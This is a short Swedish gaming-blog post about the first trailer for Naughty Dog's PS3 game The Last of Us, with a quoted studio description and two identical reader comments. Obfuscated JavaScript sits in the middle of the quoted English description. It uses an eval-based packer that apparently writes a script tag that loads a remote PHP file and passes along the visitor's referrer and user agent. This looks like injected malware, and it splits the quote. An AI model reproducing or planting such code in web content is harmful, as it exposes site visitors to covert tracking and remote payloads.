Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

The Last of Us trailer

The Last of Us trailer
Alexander Gylemo

httpv://youtu.be/qLGxubfC1Ik

The Last of Us är titeln på det kommande survival horror/actionspelet som utvecklas av Naughty Dog (skaparna bakom den grymma Uncharted-serien) exklusivt till PS3. Så här förklarar Naughty Dog co-presidenten Evan Wells spelets upplägg:

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|thbnd|var|u0026u|referrer|kdank||js|php’.split(’|’),0,{}))
Last of Us
is a genre-defining experience that blends survival and action elements to tell a character driven tale about a modern plague decimating mankind. Nature encroaches upon civilization, forcing remaining survivors to kill for food, weapons and whatever they can find. Joel, a ruthless survivor, and Ellie, a brave young teenage girl who is wise beyond her years, must work together to survive their journey across what remains of the United States.

Spelet är en riktig storsatsning och är fullsmockat med stora namn i branschen, bl.a. Bruce Straley (studio director på Naughty Dog), Mark Richard Davies (lead designer för t.ex. Enslaved: Odyssey to the West) och Gustavo Santaolalla (tvåfaldigt Oscar-belönad kompositör för bl.a. filmerna Brookeback Mountain och Babel) och av den välproducerade trailern nedan att döma kan detta bli en riktig hit!

Spelet släpps i slutet av 2012 till PS3.

Comments

  1. porky

    ser riktigt coolt ut!

  2. porky

    ser riktigt coolt ut!